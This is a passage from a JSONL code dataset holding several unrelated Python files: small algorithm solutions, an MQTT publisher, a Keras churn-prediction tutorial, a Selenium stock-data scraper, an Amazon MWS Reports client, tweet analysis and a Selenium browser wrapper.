tee命令用于读取标准输入的数据,并将其内容输出成文件。\n# tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。\n# -a或--append  附加到既有文件的后面,而非覆盖它。\nos.system('python evaluate_gpu.py | tee -a %s' % result) # 将运行结果存放到result里面\n","sub_path":"project/ReidBaseline/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"547597384","text":"# coding=utf-8\n\n\"\"\"Binary Watch.\"\"\"\n\nfrom __future__ import print_function\n\n\n# 可以直接检测 12, 60 个数中的 1 的数量而无需计算置换\ndef _solve(num):\n def _get_all_possibility(bit, total_bit):\n result = []\n\n def _deep(bit, total_bit, cur):\n if len(cur) == total_bit:\n if bit == 0:\n result.append(cur)\n elif bit == 0:\n _deep(bit, total_bit, cur + '0')\n else:\n _deep(bit, total_bit, cur + '0')\n _deep(bit - 1, total_bit, cur + '1')\n\n _deep(bit, total_bit, '')\n return [int(bin_str, 2) for bin_str in result]\n\n def _get_all_hour(bit):\n return [str(pro) for pro in _get_all_possibility(bit, 4) if pro < 12]\n\n def _get_all_minute(bit):\n mins = [('0' if pro < 10 else '') + str(pro)\n for pro in 
_get_all_possibility(bit, 6) if pro < 60]\n        return mins\n\n    ans = []\n    for hour_bit in range(0, min(5, num + 1)):\n        for hour in _get_all_hour(hour_bit):\n            for minute in _get_all_minute(num - hour_bit):\n                ans.append(hour + ':' + minute)\n    return ans\n\n\nif __name__ == '__main__':\n    print(_solve(1))\n","sub_path":"easy/401.py","file_name":"401.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"513278702","text":"# sender of our packet\r\n\r\nimport paho.mqtt.client as mqtt  # import the MQTT client\r\nimport time\r\n\r\n# use external broker\r\nbroker_address = \"192.168.0.150\"\r\nbroker_port = 1883\r\n# create new instance\r\nclient = mqtt.Client(\"AI\")\r\n# connect to broker\r\nclient.connect(broker_address, broker_port)\r\n\r\n\r\n# topic = ID (x,y)\r\nx = 0\r\ny = 1\r\n\r\n# message; these will later be filled in from the variables of the JSON file\r\nmode = 2\r\nfreq = 25.000  # in Hz\r\nR1 = 255\r\nG1 = 65\r\nB1 = 38\r\nW1 = 0\r\nR2 = 44\r\nG2 = 0\r\nB2 = 120\r\nW2 = 33\r\nR3 = 0\r\nG3 = 25\r\nB3 = 255\r\nW3 = 0\r\nhoekAlpha = 20\r\nhoekTheta = 170\r\n\r\nID = 1\r\nRGB1 = \"255,255,0,0\"\r\nRGB2 = \"255,0,0,0\"\r\nRGB3 = \"0,0,255,0\"\r\n\r\n# publish the message\r\nwhile True:\r\n    client.publish(\"AI\", \"%u;%s;%s;%s\" % (ID, RGB1, RGB2, RGB3))\r\n    #client.publish(\"%u,%u\" % (x, y), \"{%u,%f,[%u,%u,%u,%u],[%u,%u,%u,%u],[%u,%u,%u,%u],[%u,%u]}\" % (mode, freq, R1, G1, B1, W1, R2, G2, B2, W2, R3, G3, B3, W3, hoekAlpha, hoekTheta))\r\n    print(\"MQTT publisher sent its message successfully\")\r\n    time.sleep(1)","sub_path":"pythonscriptCode/Code voor 1 stengel/client_ai.py","file_name":"client_ai.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"149894141","text":"# author: mofhu@github\n# A. 
Spell Check\n\nt = int(input())\n\nfor ncase in range(1, t+1):\n n = int(input())\n s = [i for i in input()]\n s.sort()\n if ''.join(s) == 'Timru':\n ans = 'YES'\n else:\n ans = 'NO'\n print(ans)\n\n","sub_path":"codeforces/Round817/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376128890","text":"\n#%% \n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n#%%\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\n\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\n#%%\n# Encoding categorical data\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\nct = ColumnTransformer([(\"Country\", OneHotEncoder(), [1])], remainder = 'passthrough')\nX = ct.fit_transform(X)\n#%%\n# Male/Female\nlabelencoder_X = LabelEncoder()\nX[:, 4] = labelencoder_X.fit_transform(X[:, 4])\nX = X[: , 1:]\n\n#%%\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n#%%\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n#%%\n# Make ANN\n# Importing Keras Library\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n#%%\nfrom keras.layers import Dropout\n\n#%%\n# Initialize ANN\nclassifier = Sequential()\n\n#%%\n# Adding first input and hiddent layer \nclassifier.add(Dense(units=6,kernel_initializer='uniform',activation='relu' ,input_shape=(11,)))\nclassifier.add(Dropout(rate=0.1))\n# Adding another hidden layer\nclassifier.add(Dense(6,kernel_initializer='uniform',activation='relu'))\nclassifier.add(Dropout(rate=0.1))\n# Adding output layer\nclassifier.add(Dense(1,kernel_initializer='uniform',activation='sigmoid'))\n\n#%%\n# Compiling the ANN\nclassifier.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n\n#%%\n# Fitting the ANN to the Training set\nclassifier.fit(x=X_train,y=y_train,batch_size=10,epochs=100)\n\n#%%\n# Fitting classifier to the Training set\n# Create your classifier here\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\ny_pred = (y_pred > 0.5)\n\n#%%\n# Predict a Single customer\n\nnew_prediction = classifier.predict(sc.transform(np.array([[0,0,600,1,40,3,60000,2,1,1,5000]])))\n#%%\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n\n# %%\n# Evaluating ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\n\ndef build_classifier () :\n classifierB = Sequential()\n classifierB.add(Dense(units=6,kernel_initializer='uniform',activation='relu' ,input_shape=(11,)))\n classifierB.add(Dense(6,kernel_initializer='uniform',activation='relu'))\n classifierB.add(Dense(1,kernel_initializer='uniform',activation='sigmoid'))\n classifierB.compile(optimizer='adam',loss='binary_crossentropy',metrics=['accuracy'])\n return classifierB\n\nclassifierD = KerasClassifier(build_fn = build_classifier,batch_size = 10 ,epochs = 100)\naccuracies = cross_val_score(estimator = classifierD , X = X_train , y = y_train , cv = 10 , n_jobs = -1)\n\n#%%\nmean = 
accuracies.mean()\n\n# %%\n# Tuning ANN\nfrom sklearn.model_selection import GridSearchCV\n\ndef build_classifier (optimize) :\n classifierB = Sequential()\n classifierB.add(Dense(units=6,kernel_initializer='uniform',activation='relu' ,input_shape=(11,)))\n classifierB.add(Dense(6,kernel_initializer='uniform',activation='relu'))\n classifierB.add(Dense(1,kernel_initializer='uniform',activation='sigmoid'))\n classifierB.compile(optimizer= optimize,loss='binary_crossentropy',metrics=['accuracy'])\n return classifierB\n\nclassifierD = KerasClassifier(build_fn = build_classifier)\ngridParameters = {'batch_size': [25,32],'epochs': [100,500],'optimize':['adam','rmsprop']}\ngrid_search = GridSearchCV(estimator=classifierD,param_grid=gridParameters,scoring='accuracy',cv=10)\ngrid_search = grid_search.fit(X=X_train,y=y_train)\nbest_parameters = grid_search.best_params_\nbest_accuracy = grid_search.best_score_\n\n\n# %%\n","sub_path":"Training/Artificial_Neural_Networks/AnnTraining.py","file_name":"AnnTraining.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"488799919","text":"import os, sys, re, shutil, requests, bs4, subprocess, requests, math, time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom datetime import datetime\nfrom datetime import timedelta\nimport sqlite3\n\nchrome_path = \"C:\\chromedriver\\chromedriver.exe\"\nweb = webdriver.Chrome(chrome_path)\nweb.get('http://mops.twse.com.tw/mops/web/t05st03')\n\nString_Search = re.compile(r'(\\(.*?\\))')\n\nconn = sqlite3.connect('stock_list.db')\nc = conn.cursor()\ncursor = c.execute(\"SELECT stock_id, stock_name, start_date, stock_type, business from stock_list\")\n\npath = os.getcwd()\npath = path + '\\\\stock_db'\nos.chdir(path)\nprint(os.getcwd())\n\nfor current_entry in cursor:\n cannot_find = 0\n if ((current_entry[3] == '上櫃') or (current_entry[3] == '上市')) and (current_entry[4] != 'ETF'):\n input1 = web.find_element_by_id('co_id')\n input1.clear()\n input1.send_keys(current_entry[0])\n n = 0\n while 1:\n web.find_element_by_xpath(\"//input [@value=' 查詢 ']\").click()\n time.sleep(7)\n soup = bs4.BeautifulSoup(web.page_source, \"lxml\")\n table_keystring = soup.find('th', string='已發行普通股數或TDR原股發行股數')\n n = n + 1\n if table_keystring != None:\n break\n elif n == 5:\n cannot_find = 1\n break\n if cannot_find == 1:\n continue\n print(table_keystring)\n next_td_tag = table_keystring.findNext('td')\n result = String_Search.search(next_td_tag.getText())\n capital_amount = next_td_tag.getText().replace(result.group(1),'').strip().replace(',','').replace('股','')\n db_name = current_entry[0] + '.db'\n print(db_name)\n print(capital_amount)\n conn_stock = sqlite3.connect(db_name)\n c_stock = conn_stock.cursor()\n sql_cmd = 'REPLACE INTO stock_info (date_ID, capital_amount) VALUES (1,' + capital_amount + ')'\n print(sql_cmd)\n c_stock.execute(sql_cmd)\n conn_stock.commit()\n conn_stock.close()\n\npath = os.getcwd()\npath = path.replace('\\\\stock_db','')\nos.chdir(path)\n\nconn.close()\nweb.close()\n","sub_path":"8_stock_capital_amount.py","file_name":"8_stock_capital_amount.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336021751","text":"import copy\nimport sys\nfrom datetime import datetime\nfrom math import exp\nfrom random import random, randint, 
choice\n\n\nclass Perceptron:\n \"\"\"\n Class to represent a single Perceptron in the net.\n \"\"\"\n\n def __init__(self, in_size=1, weights=None):\n self.inSize = in_size + 1 # number of perceptrons feeding into this one; add one for bias\n if weights is None:\n # weights of previous layers into this one, random if passed in as None\n self.weights = [1.0] * self.inSize\n self.set_random_weights()\n else:\n self.weights = weights\n\n def get_weighted_sum(self, in_acts):\n \"\"\"\n Returns the sum of the input weighted by the weights.\n \n Inputs:\n in_acts (list): input values, same as length as inSize\n Returns:\n float\n The weighted sum\n \"\"\"\n return sum([inAct * inWt for inAct, inWt in zip(in_acts, self.weights)])\n\n def sigmoid(self, value):\n \"\"\"\n Return the value of a sigmoid function.\n \n Args:\n value (float): the value to get sigmoid for\n Returns:\n float\n The output of the sigmoid function parametrized by \n the value.\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def sigmoid_activation(self, in_acts):\n \"\"\"\n Returns the activation value of this Perceptron with the given input.\n Same as g(z) in book.\n Remember to add 1 to the start of inActs for the bias input.\n \n Inputs:\n in_acts (list): input values, not including bias\n Returns:\n float\n The value of the sigmoid of the weighted input\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def sigmoid_deriv(self, value):\n \"\"\"\n Return the value of the derivative of a sigmoid function.\n \n Args:\n value (float): the value to get sigmoid for\n Returns:\n float\n The output of the derivative of a sigmoid function\n parametrized by the value.\n \"\"\"\n \"\"\"YOUR CODE\"\"\"\n\n def sigmoid_activation_deriv(self, in_acts):\n \"\"\"\n Returns the derivative of the activation of this Perceptron with the\n given input. 
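The """YOUR CODE""" stubs in this Perceptron scaffold are exercise blanks. One way to fill the sigmoid pair, kept outside the class so the scaffold above stays untouched; a sketch using the same g(z) = 1 / (1 + e^-z) convention the docstrings cite:

from math import exp

def sigmoid(value):
    return 1.0 / (1.0 + exp(-value))

def sigmoid_deriv(value):
    s = sigmoid(value)
    return s * (1.0 - s)           # g'(z) = g(z) * (1 - g(z))

# the activation methods prepend the bias input 1 before the weighted sum, e.g.:
#     self.sigmoid(self.get_weighted_sum([1] + in_acts))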
\n\n    def sigmoid_activation_deriv(self, in_acts):\n        \"\"\"\n        Returns the derivative of the activation of this Perceptron with the\n        given input. Same as g'(z) in book (note that this is not rounded).\n        Remember to add 1 to the start of inActs for the bias input.\n        \n        Inputs:\n            in_acts (list): input values, not including bias\n        Returns:\n            float\n            The derivative of the sigmoid of the weighted input\n        \"\"\"\n        \"\"\"YOUR CODE\"\"\"\n\n    def update_weights(self, in_acts, alpha, delta):\n        \"\"\"\n        Updates the weights for this Perceptron given the input delta.\n        Remember to add 1 to the start of inActs for the bias input.\n        \n        Inputs:\n            in_acts (list): input values, not including bias\n            alpha (float): The learning rate\n            delta (float): If this is an output, then g'(z)*error\n                   If this is a hidden unit, then, as defined,\n                   g'(z) * (sum over weight*delta for the next layer)\n        Returns:\n            float\n            Return the total modification of all the weights (sum of each abs(modification))\n        \"\"\"\n        total_modification = 0\n        \"\"\"YOUR CODE\"\"\"\n        return total_modification\n\n    def set_random_weights(self):\n        \"\"\"\n        Generates random input weights that vary from -1.0 to 1.0\n        \"\"\"\n        for i in range(self.inSize):\n            self.weights[i] = (random() + .0001) * (choice([-1, 1]))\n\n    def __str__(self):\n        outStr = ''\n        outStr += 'Perceptron with %d inputs\\n' % self.inSize\n        outStr += 'Node input weights %s\\n' % str(self.weights)\n        return outStr\n\n\nclass NeuralNet:\n    \"\"\"\n    Class to hold the net of perceptrons and implement functions for it.\n    \"\"\"\n\n    def __init__(self, layer_size):  # default 3 layer, 1 percep per layer\n        \"\"\"\n        Initiates the NN with the given sizes.\n        \n        Args:\n            layer_size (list): the number of perceptrons in each layer\n        \"\"\"\n        self.layer_size = layer_size  # Holds number of inputs and perceptrons in each layer\n        self.output_layer = []\n        self.num_hidden_layers = len(layer_size) - 2\n        self.hidden_layers = [[] for x in range(self.num_hidden_layers)]\n        self.num_layers = self.num_hidden_layers + 1\n\n        # build hidden layer(s)\n        for h in range(self.num_hidden_layers):\n            for p in range(layer_size[h + 1]):\n                percep = Perceptron(layer_size[h])  # num of perceps feeding into this one\n                self.hidden_layers[h].append(percep)\n\n        # build output layer\n        for i in range(layer_size[-1]):\n            percep = Perceptron(layer_size[-2])  # num of perceps feeding into this one\n            self.output_layer.append(percep)\n\n        # build layers list that holds all layers in order - use this structure\n        # to implement back propagation\n        self.layers = [self.hidden_layers[h] for h in range(self.num_hidden_layers)] + [self.output_layer]\n\n    def __str__(self):\n        out_str = ''\n        out_str += '\\n'\n        for hidden_index in range(self.num_hidden_layers):\n            out_str += '\\nHidden Layer #%d' % hidden_index\n            for index in range(len(self.hidden_layers[hidden_index])):\n                out_str += 'Percep #%d: %s' % (index, str(self.hidden_layers[hidden_index][index]))\n            out_str += '\\n'\n        for i in range(len(self.output_layer)):\n            out_str += 'Output Percep #%d:%s' % (i, str(self.output_layer[i]))\n        return out_str\n\n    def feed_forward(self, in_acts):\n        \"\"\"\n        Propagate input vector forward to calculate outputs.\n        \n        Args:\n            in_acts (list): the input to the NN (an example)\n        Returns:\n            list of lists\n            A list of lists. The first list is the input list, and the others are\n            lists of the output values of all perceptrons in each layer.\n        \"\"\"\n        \"\"\"YOUR CODE\"\"\"
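\n        # A minimal sketch, assuming the sigmoid_activation method above is\n        # implemented:\n        #   outputs = [in_acts]\n        #   for layer in self.layers:\n        #       outputs.append([p.sigmoid_activation(outputs[-1]) for p in layer])\n        #   return outputs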
\n\n    def backprop_learning(self, examples, alpha):\n        \"\"\"\n        Run a single iteration of the backward propagation learning algorithm.\n        See the text and slides for pseudo code.\n        \n        Args: \n            examples (list of (list, list) tuples):\n                for each tuple the first element is the input (feature) \"vector\" (list),\n                the second element is the output \"vector\" (list)\n            alpha (float): the alpha to train with\n        Returns\n           tuple\n           \n           A tuple of average_error and average_weight_change, to be used as stopping conditions.\n           average_error is the summed error^2/2 of all examples, divided by numExamples*numOutputs.\n           average_weight_change is the summed absolute weight change of all perceptrons,\n           divided by the sum of their input sizes (the average weight change for a single perceptron).\n        \"\"\"\n        # keep track of output\n        average_error = 0\n        average_weight_change = 0\n        num_weights = 0\n\n        for example in examples:  # for each example\n            # keep track of deltas to use in weight change\n            deltas = []\n            # Neural net output list\n            all_layer_output = \"\"\"FILL IN - neural net output list computation\"\"\"\n            last_layer_output = all_layer_output[-1]\n            # Empty output layer delta list\n            out_delta = []\n            # iterate through all output layer neurons\n            for output_num in range(len(example[1])):\n                g_prime = self.output_layer[output_num].sigmoid_activation_deriv(\"\"\"FILL IN\"\"\")\n                error = \"\"\"FILL IN - error for this neuron\"\"\"\n                delta = \"\"\"FILL IN - delta for this neuron\"\"\"\n                average_error += error * error / 2\n                out_delta.append(delta)\n            deltas.append(out_delta)
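\n            # For reference, the standard textbook forms: at the output layer\n            # delta_k = g'(in_k) * (y_k - a_k); for a hidden unit\n            # delta_j = g'(in_j) * (sum over k of w_jk * delta_k).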
\n\n            \"\"\"\n            Backpropagate through all hidden layers, calculating and storing\n            the deltas for each perceptron layer.\n            \"\"\"\n            for layer_num in range(self.num_hidden_layers - 1, -1, -1):\n                layer = self.layers[layer_num]\n                next_layer = self.layers[layer_num + 1]\n                hidden_delta = []\n                # Iterate through all neurons in this layer\n                for neuronNum in range(len(layer)):\n                    g_prime = layer[neuronNum].sigmoid_activation_deriv(\"\"\"FILL IN\"\"\")\n                    delta = \"\"\"FILL IN - delta for this neuron\n                           Carefully look at the equation here,\n                           it is easy to do this by intuition incorrectly\"\"\"\n                    hidden_delta.append(delta)\n                deltas = [hidden_delta] + deltas\n            \"\"\"Get output of all layers\"\"\"\n\n            \"\"\"\n            Having aggregated all deltas, update the weights of the \n            hidden and output layers accordingly.\n            \"\"\"\n            for num_layer in range(0, self.num_layers):\n                layer = self.layers[num_layer]\n                for numNeuron in range(len(layer)):\n                    weight_mod = layer[numNeuron].update_weights(\"\"\"FILL IN\"\"\")\n                    average_weight_change += weight_mod\n                    num_weights += layer[numNeuron].inSize\n            # end for each example\n        # calculate final output\n        average_error /= (len(examples) * len(examples[0][1]))  # number of examples x length of output vector\n        average_weight_change /= num_weights\n        return average_error, average_weight_change\n\n\ndef build_neural_net(examples, alpha=0.1, weight_change_threshold=0.00008, hidden_layer_list=[1], max_iter=sys.maxsize,\n                     start_nn=None):\n    \"\"\"\n    Train a neural net for the given input.\n    \n    Args: \n        examples (tuple of two lists): A tuple of (training examples, test examples),\n                  each a list of (input list, output list) tuples\n        alpha (float): the alpha to train with\n        weight_change_threshold (float): The threshold to stop training at\n        max_iter (int): Maximum number of iterations to run\n        hidden_layer_list (list): The list of numbers of Perceptrons\n                                  for the hidden layer(s).\n        start_nn (NeuralNet): A NeuralNet to train, or None if a new NeuralNet\n        should be trained from random weights.\n    Returns\n       tuple\n       \n       A tuple of the trained Neural Network and the accuracy that it achieved \n       once the weight modification reached the threshold, or the iteration \n       exceeds the maximum iteration.\n    \"\"\"\n    examples_train, examples_test = examples\n    num_in = len(examples_train[0][0])\n    num_out = len(examples_test[0][1])\n    time = datetime.now().time()\n    if start_nn is not None:\n        hidden_layer_list = [len(layer) for layer in start_nn.hidden_layers]\n    print(\n        \"Starting training at time %s with %d inputs, %d outputs, %s hidden layers, size of training set %d, and size of test set %d\" \\n        % (str(time), num_in, num_out, str(hidden_layer_list), len(examples_train), len(examples_test)))\n    layer_list = [num_in] + hidden_layer_list + [num_out]\n    nnet = NeuralNet(layer_list)\n    if start_nn is not None:\n        nnet = start_nn\n    \"\"\"\n    YOUR CODE\n    \"\"\"\n    iteration = 0\n    train_error = 0\n    weight_mod = 0\n\n    \"\"\"\n    Iterate for as long as it takes to reach the weight modification threshold\n    \"\"\"\n    # if iteration%10==0:\n    # print('! on iteration %d; training error %f and weight change %f'%(iteration,train_error,weight_mod))\n    # else :\n    # print('.',end='')\n\n\n    time = datetime.now().time()\n    print('Finished after %d iterations at time %s with training error %f and weight change %f' % (\n        iteration, str(time), train_error, weight_mod))\n\n    \"\"\"\n    Get the accuracy of your Neural Network on the test examples.\n\tFor each test example, you should first feedforward to get the NN outputs. Then, round the list of outputs from the output layer of the neural net.\n\tIf the entire rounded list from the NN matches the known list from the test example, then add to test_correct, else add to test_error.\n    \"\"\"\n\n    test_error = 0\n    test_correct = 0\n\n    test_accuracy = 0  # num correct/num total\n\n    print('Feed Forward Test correctly classified %d, incorrectly classified %d, test accuracy %f\\n' % (\n        test_correct, test_error, test_accuracy))\n\n    \"\"\"return something\"\"\"\n","sub_path":"prj4Instructions/python/NeuralNet.py","file_name":"NeuralNet.py","file_ext":"py","file_size_in_byte":12806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"388408787","text":"from .utils import flatten_list\n\n\nclass Reports(object):\n    \"\"\"\n    Implements a report client for Amazon MWS.\n\n    The report API works differently from other APIs and\n    it is important to have a good understanding of\n    how this API works from `MWS reports overview\n    `__\n    \"\"\"  # noqa: E501\n    VERSION = '2009-01-01'\n    URI = '/Reports/' + VERSION\n\n    def __init__(self, client):\n        self.client = client\n\n    def request_report(self, **kwargs):\n        \"\"\"\n        Creates a report request and submits the request to Amazon MWS.\n\n        Amazon MWS processes the report request and when the report is\n        completed, sets the status of the report request to _DONE_.\n        Reports are retained for 90 days.\n\n        `Learn more `__\n        \"\"\"  # noqa: E501\n        flatten_list(kwargs, 'MarketplaceIdList', 'Id')\n        return self.client.post(\n            'RequestReport', self.URI, kwargs, self.VERSION\n        )\n\n    def get_report_request_list(self, **kwargs):\n        \"\"\"\n        Returns a list of report requests that you can use to get the\n        ReportRequestId for a report.\n\n        `Learn more `__\n        \"\"\"  # noqa: E501\n        flatten_list(kwargs, 'ReportTypeList', 'Type')\n        flatten_list(kwargs, 'ReportRequestIdList', 'Id')\n        flatten_list(kwargs, 
'ReportProcessingStatusList', 'Status')\n return self.client.get(\n 'GetReportRequestList', self.URI, kwargs, self.VERSION\n )\n\n def get_report_request_list_by_next_token(self, NextToken):\n \"\"\"\n Returns a list of report requests using the NextToken,\n which was supplied by a previous request to either\n GetReportRequestListByNextToken or GetReportRequestList,\n where the value of HasNext was true in that previous request.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportRequestListByNextToken', self.URI,\n {'NextToken': NextToken}, self.VERSION\n )\n\n def get_report_request_count(self, **kwargs):\n \"\"\"\n Returns a count of report requests that have been submitted\n to Amazon MWS for processing.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportRequestCount', self.URI, kwargs, self.VERSION\n )\n\n def cancel_report_request(self, **kwargs):\n \"\"\"\n Cancels one or more report requests.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.post(\n 'CancelReportRequests', self.URI, kwargs, self.VERSION\n )\n\n def get_report_list(self, **kwargs):\n \"\"\"\n Returns a list of reports that were created in the previous 90 days.\n\n `Learn more `__\n \"\"\" # noqa: E501\n flatten_list(kwargs, 'ReportTypeList', 'Type')\n flatten_list(kwargs, 'ReportRequestIdList', 'Id')\n flatten_list(kwargs, 'MarketplaceIdList', 'Id')\n return self.client.get(\n 'GetReportList', self.URI, kwargs, self.VERSION\n )\n\n def get_report_list_by_next_token(self, NextToken):\n \"\"\"\n Returns a list of reports using the NextToken, which was supplied\n by a previous request to either GetReportListByNextToken or\n GetReportList, where the value of HasNext was true in the\n previous call.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportListByNextToken', self.URI,\n {'NextToken': NextToken}, self.VERSION\n )\n\n def get_report_count(self, **kwargs):\n \"\"\"\n Returns a count of the reports, created in the previous 90 days,\n with a status of _DONE_ and that are available for download.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReportCount', self.URI, kwargs, self.VERSION\n )\n\n def get_report(self, ReportId):\n \"\"\"\n Returns the contents of a report and the Content-MD5 header for the\n returned report body.\n\n `Learn more `__\n \"\"\" # noqa: E501\n return self.client.get(\n 'GetReport', self.URI,\n {'ReportId': ReportId}, self.VERSION\n )\n","sub_path":"pymws/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573925008","text":"import json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom pandas.tseries.resample import TimeGrouper\nfrom pandas.tseries.offsets import DateOffset\nfrom NLP.Turkish.TweetUtils import preprocessTweet\n\npd.options.display.width = 400\npd.options.display.max_colwidth = 150\n\n\ndef isValidTweet(tweet):\n return \"created_at\" in tweet\n\n\ndef getText(tweet):\n if \"retweeted_status\" in tweet:\n return tweet[\"retweeted_status\"][\"text\"]\n else:\n return tweet[\"text\"]\n\n\ndef getTweetJsonData():\n filePath = \"/media/sf_ubuntu/TURKEY/500.json\"\n tweets_json = []\n\n with open(filePath) as json_data:\n for line in json_data:\n tweet = json.loads(line)\n if isValidTweet(tweet):\n tweets_json.append(tweet)\n\n return tweets_json\n\n\ntweets_json = getTweetJsonData()\n\ntweets = 
pd.DataFrame()\ntweets["created_at"] = pd.to_datetime([t["created_at"] for t in tweets_json])\ntweets["created_at"] = tweets["created_at"] + timedelta(hours=3)\ntweets.set_index('created_at', drop=False, inplace=True)\ntweets["text"] = [getText(t) for t in tweets_json]\ntweets["user_id"] = [t["user"]["id"] for t in tweets_json]\ntweets.describe()\n\ntweets1m = tweets['created_at'].resample('1t').count()\ntweets1m.head()\navg = tweets1m.mean()\n\nimport vincent\nvincent.core.initialize_notebook()\narea = vincent.Area(tweets1m)\narea.colors(brew='Spectral')\narea.display()","sub_path":"NLP/Turkish/EDA_TIME_SERIES.py","file_name":"EDA_TIME_SERIES.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"646305547","text":"\"\"\"https://projecteuler.net/problem=13\"\"\"\n\nimport unittest\nfrom project_euler.problem_13 import chop_into_list, solve, INPUT\n\n\nclass Problem13Test(unittest.TestCase):\n    \"\"\"Test fixture for problem 13.\"\"\"\n\n    def test_chop_into_list_with_problem_input(self):\n        \"\"\"Tests the function using the problem's input.\"\"\"\n        expected = 100  # The string should be sliced into 100 substrings.\n        size = 50\n\n        actual = chop_into_list(INPUT, size)\n\n        self.assertEqual(expected, len(actual))\n\n    def test_solve_with_simple_input(self):\n        \"\"\"Tests the solve function using a simple input string.\"\"\"\n        expected = \"1368\"  # The sum of 123 + 456 + 789\n        simple_input = \"123456789\"\n        size = 3\n\n        actual = solve(simple_input, size)\n\n        self.assertEqual(expected, actual)\n\n    def test_solve_with_actual_input(self):\n        \"\"\"Test that confirms the answer to the problem.\"\"\"\n        expected = \"5537376230\"\n        size = 50\n\n        actual = solve(INPUT, size)\n\n        self.assertEqual(expected, actual)","sub_path":"Python/project_euler/tests/problem_13_test.py","file_name":"problem_13_test.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"41935070","text":"\"\"\"\n@time: 2020/1/14 10:13 PM\n@Author: kongwiki\n@File: 136.SingleNumber.py\n@Email: kongwiki@163.com\n\"\"\"\n\"\"\"\nFind the element that appears only once\n\"\"\"\n\n\nclass Solution:\n\tdef singleNumber(self, nums):\n\t\t\"\"\"\n\n\t\t:param nums: a list\n\t\t:return: the value that occurs exactly once\n\t\t\"\"\"\n\t\tnums_dict = {}\n\t\tfor i in nums:\n\t\t\tif i in nums_dict:\n\t\t\t\tnums_dict[i] += 1\n\t\t\telse:\n\t\t\t\tnums_dict[i] = 1\n\t\treturn sorted(nums_dict.items(), key=lambda x: x[1], reverse=False)[0][0]\n\n\nif __name__ == '__main__':\n\ta = [4, 1, 2, 1, 2]\n\ts = Solution()\n\tnumber = s.singleNumber(a)\n\tprint(number)\n\tprint(1^5)
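\n\t# Note: since every other value appears exactly twice, XOR-reducing the list\n\t# (e.g. functools.reduce(operator.xor, nums)) would also recover the single\n\t# element, in O(1) extra space instead of the dict's O(n).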
","sub_path":"136.SingleNumber.py","file_name":"136.SingleNumber.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"261087010","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\n\r\n\r\nclass Browser():\r\n    \"\"\"Abstracted Selenium functionality for simpler use.\r\n\r\n    Attributes\r\n    ----------\r\n    driver : selenium.webdriver object\r\n        The webdriver object will differ depending on the browser used.\r\n    driver_wait : selenium.webdriver.support.ui.WebDriverWait\r\n    \"\"\"\r\n\r\n    def __init__(self, browser, driver_path=None, driver_wait_time=30):\r\n        \"\"\"\r\n        Parameters\r\n        ----------\r\n        browser : str\r\n            Valid options are: \"chrome\", \"edge\", \"firefox\", \"ie\"\r\n        driver_path : str, optional\r\n            File path to webdriver. Will look in PATH if not set.\r\n        driver_wait_time : int, optional\r\n            Amount of time in seconds to wait when locating elements before\r\n            timing out.\r\n        \"\"\"\r\n        self.driver = self._get_driver(browser, driver_path)\r\n        self.driver_wait = WebDriverWait(\r\n            driver=self.driver, 